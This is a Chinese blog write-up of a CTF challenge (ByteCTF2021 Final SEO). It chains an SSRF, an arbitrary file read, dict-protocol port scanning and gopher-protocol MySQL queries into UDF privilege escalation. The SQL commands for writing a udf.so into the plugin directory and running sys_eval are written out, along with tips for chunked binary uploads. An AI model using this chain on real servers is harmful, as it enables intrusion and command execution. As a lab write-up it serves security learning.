记一次SSRF练习

记一次SSRF练习


老表发我一个SSRF的CTF题,感觉还不错,还能练习下SSRF挖掘技巧,权作学习记录。

审题

环境搭建:

git clone https://github.com/sqlsec/ByteCTF2021-Final-SEO.git
cd ByteCTF2021-Final-SEO/Dockerfile
docker-compose up -d

docker搭建好基本上就是一个seo站长工具界面,撸了一遍接口发现如下接口存在漏洞。

image-20211219225804012

做题

image-20211219225930395

到这基本上就确定SSRF点了,不过这个是我测试方法,一般情况下还要测试下外网域名是否能够访问。

从info.php确定主机内网IP:172.73.23.21,之后就可以进行内网扫描。这个站点还有一个文件下载,能够造成任意文件读取,很有必要的,查看内网的一些信息(proc/net/arp)。

image-20211219230814303

这个还是比较好的一个点,如果有该主机的话就会有mac地址信息。之后用dict进行端口扫描,发现3306端口。

查看info.php可知使用了gopher协议,直接使用工具生成查询语句测试,注意二次URL编码。

image-20211219231732614

image-20211219231932272

后续进行UDF提权,几个命令如下:

#查看主机版本及架构
show variables like '%compile%';
#查看 plugin 目录(/usr/lib/mysql/plugin/)
show variables like 'plugin%';              
SELECT 0x7f454c460201010000000.......00000 INTO DUMPFILE '/usr/lib/mysql/udf.so';
#创建函数
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';         
select sys_eval('cat /flag');

交卷

image-20211221121112016

经验总结

1.UDF提权过程中,系统环境可能不同,数据库版本可能不同,需要注意。

2.dll,so文件获取可以在kali的路径/usr/share/metasploit-framework/data/exploits/mysql/下获取。

3.gopherus在使用过程中要注意,不同的系统窗口复制粘贴可能大小限制,数据过长可以直接修改gopherus,避免row_input传参。

4.插入数据过程中有限制的话可以使用如下语句拼接:

create table temp(data longblob);
insert into temp(data) values (0x4d5a9000......);
update temp set data = concat(data,0x33c2e......);
select data from temp into dumpfile '/usr/lib/mysql/plugin/udf.so';

5.udf提权只能创建so库里有的函数,不能随意命名,可以使用objdump -tT lib_mysqludf_sys_64.so查看。

  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值